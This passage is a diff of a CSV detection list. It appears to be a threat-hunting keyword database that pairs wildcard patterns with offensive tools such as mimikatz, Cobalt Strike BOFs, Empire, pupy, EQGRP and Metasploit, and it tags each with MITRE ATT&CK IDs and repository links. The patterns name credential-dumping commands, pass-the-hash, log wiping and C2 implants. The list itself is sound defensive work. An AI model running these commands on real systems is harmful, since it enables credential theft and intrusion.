- TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::krbtgt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::livessp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::logonpasswords*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. This function retrieves plaintext credentials from the LSA secrets in memory.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::minidump*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::msv*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::process*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::pth*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash.This function performs pass-the-hash attacks allowing an attacker to authenticate to a remote system with a stolen hash.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::ssp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::tickets*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::tspkg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::wdigest*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*SELECT * FROM EvilSignature*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*SELECT * FROM EvilSignature*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*SELECT displayName FROM AntiVirusProduct*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" "*SELECT SYSTEM_USER as 'Logged in as'* CURRENT_USER as 'Mapped as'*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*self_delete.x64.o*","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","159","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" "*Self_Deletion_BOF*","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","159","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" -"*-selfdelete.exe -d:selfdelete*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*-selfdelete.exe -d:selfdelete*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*SeManageVolumeExploit.*","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" "*SeManageVolumeExploit-main","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" "*Semperis/GoldenGMSA*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" "*send \*\[ \\*\$BASH\\* = \\*/bin/bash\\* -o \\*\$SHELL\\* = \\*/bin/bash\\* \]*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" -"*Send the payload with the grooms*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*send_ps1_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Send the payload with the grooms*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*send_ps1_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*send_shellcode_via_pipe*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" "*send_shellcode_via_pipe*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*Send-CalendarNTLMLeak *","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "*sendmail -osendmail chmod +x sendmail*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" -"*sense2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*sense2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*sensepost/goDoH*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*sensepost/reGeorg*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" -"*sensepost/ruler*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*sensepost/ruler*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" "*sensepost/wiresocks*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" -"*sensitive_files_win.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Sensitivelocalfiles.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*sensitive_files_win.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" 